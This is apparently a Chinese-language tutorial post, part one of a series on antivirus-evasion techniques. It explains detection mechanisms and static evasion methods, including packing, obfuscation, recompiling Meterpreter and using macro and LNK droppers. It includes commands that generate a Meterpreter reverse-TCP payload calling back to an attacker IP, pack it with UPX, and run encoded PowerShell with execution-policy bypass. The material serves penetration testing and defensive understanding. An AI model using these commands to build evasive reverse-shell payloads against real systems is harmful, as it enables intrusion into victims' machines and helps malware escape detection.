关于 免杀(上)

网络安全中的免杀技术:原理、方法与防御

免杀(Anti-AntiVirus,简称 AAV)是绕过杀毒软件、入侵检测系统(IDS)、入侵防御系统(IPS)等安全产品检测的技术,广泛应用于渗透测试的 payload 投递环节,同时也是恶意代码逃避查杀的核心手段。

在合法的渗透测试场景中,免杀是验证目标网络防御有效性的重要技术;但在黑产领域,免杀会被用于传播病毒、木马等恶意程序,需严格区分合法用途与非法滥用的边界。

一、免杀的核心原理

杀毒软件的检测机制主要分为 特征码检测、行为检测、启发式检测、云检测 四类,免杀技术本质就是针对这些检测机制的规避手段。

  1. 特征码检测 杀毒软件会提取恶意程序的唯一特征(如特定字节序列、哈希值 MD5/SHA1)存入病毒库,扫描时比对文件特征。免杀核心思路:修改特征码,让程序脱离病毒库的匹配范围。
  2. 行为检测 监控程序运行时的恶意行为(如创建后门、远程连接、修改注册表、注入进程),通过行为规则判定恶意性。免杀核心思路:隐藏或伪装恶意行为,如延迟执行、分段执行、模拟正常程序行为。
  3. 启发式检测 不依赖病毒库,通过分析程序的代码结构、指令序列(如调用敏感 API、内存操作),预判程序是否存在潜在威胁。免杀核心思路:模糊代码逻辑、混淆敏感指令,降低启发式引擎的识别概率。
  4. 云检测 将文件哈希、特征信息上传至云端进行比对,结合大数据分析判定恶意性。免杀核心思路:避免文件特征入库,如使用动态生成 payload、加密传输数据。

二、静态免杀

静态免杀:修改文件特征,规避特征码 / 启发式检测

  1. 加壳 / 加花指令

    • 原理:加壳是对程序进行加密压缩,运行时由壳代码解密后再执行,隐藏原始程序的特征码;加花指令是在程序头部 / 尾部添加无意义的指令(如空指令、垃圾代码),改变文件的字节特征,不影响程序功能。

    • 工具

      • 压缩壳:UPX、ASPack(易被杀毒软件识别,需搭配其他方法);
      • 加密壳:VMProtect、Themida(强度较高,通过虚拟化指令混淆代码);
      • 手动加花:使用汇编器(NASM)编写花指令,通过 HIEW 010 Editor 等十六进制编辑器插入。
    • 实操示例 :对 msfvenom 生成的 payload 进行 UPX 加壳

      bash 复制代码
      # 生成原始 payload(Windows 反向连接)
      msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe
      # 使用 UPX 加壳压缩
      upx -9 payload.exe -o payload_upx.exe
    • 注意:单纯加壳易被查杀,需结合混淆、加密等手段。

  2. 代码混淆与加密

    • 原理:通过修改代码的语法结构、变量名、函数名,或对核心代码进行加密(如 AES、RC4 加密),隐藏敏感逻辑,规避启发式检测。
    • 适用场景:自定义编写的木马、脚本类 payload(如 Python、PowerShell、C# 代码)。
    • 工具与实操
      • Python 脚本混淆 :使用 pyminifier 混淆代码,或对核心功能进行 AES 加密,运行时解密执行

        bash 复制代码
        # 安装 pyminifier
        pip install pyminifier
        # 混淆 Python 脚本
        pyminifier --obfuscate=1 --rename-globals payload.py -o payload_obf.py
      • C# 代码混淆 :使用 ConfuserEx 工具,通过控制流混淆、字符串加密、虚方法注入等方式混淆程序集。

    • 核心技巧:避免硬编码敏感数据(如 IP、端口),改为运行时从配置文件 / 网络获取。
  3. 重编译与特征修改

    • 原理:针对开源恶意代码(如 Meterpreter、Cobalt Strike Beacon),修改源代码中的特征字符串、函数名,再重新编译,彻底改变文件特征码。
    • 实操示例 :修改 Meterpreter 源代码
      1. 下载 Metasploit 源码,找到 meterpreter/source 目录下的核心文件;
      2. 替换代码中的特征字符串(如 Meterpreter 改为随机字符串),调整函数的参数顺序;
      3. 使用 MinGW/Visual Studio 重新编译生成 exe 文件。
    • 优势 :修改彻底,免杀效果持久;缺点:需要具备对应编程语言的编译能力。
  4. 文件类型转换

    • 原理:将易被检测的文件类型(如 exe、dll)转换为其他类型(如 scr、bat、ps1),或封装为文档(如 Word、Excel 宏文件)、图片(如 PNG 隐写),利用目标系统的漏洞或信任机制执行。
    • 常见手段
      • 宏病毒免杀 :编写混淆后的 VBA 宏代码,嵌入 Word 文档,通过 Enable Content 触发执行;

      • 脚本免杀 :将 PowerShell 脚本进行 Base64 编码,通过命令行隐蔽执行

        bash 复制代码
        powershell -exec bypass -enc <Base64编码后的脚本>
      • LNK 快捷方式钓鱼:制作恶意 LNK 文件,双击时执行隐藏的 payload。

相关推荐
chian-ocean6 小时前
深入 CANN:使用 `tbe-op` 构建自定义高性能算子
网络
中议视控7 小时前
可编程网络中央控制系统主机通过红外发射棒控制空调电视等红外设备
网络·物联网·5g
黑客老李7 小时前
web渗透实战 | js.map文件泄露导致的通杀漏洞
安全·web安全·小程序·黑客入门·渗透测试实战
财经三剑客8 小时前
AI元年,春节出行安全有了更好的答案
大数据·人工智能·安全
数据安全科普王8 小时前
打破中心枷锁:P2P网络如何用“去中心化”重构互联网通信
网络·去中心化·p2p
爱吃烤鸡翅的酸菜鱼8 小时前
CANN ops-nn激活函数与池化算子深度解析
网络·开源·aigc
saber_andlibert9 小时前
TCMalloc底层实现
java·前端·网络
潆润千川科技10 小时前
中老年同城社交应用后端设计:如何平衡安全、性能与真实性?
安全·聊天小程序
市场部需要一个软件开发岗位10 小时前
JAVA开发常见安全问题:纵向越权
java·数据库·安全
飞凌嵌入式11 小时前
用「EN 18031认证」通关欧盟,这张 “网络安全护照” 已就位
网络·安全·能源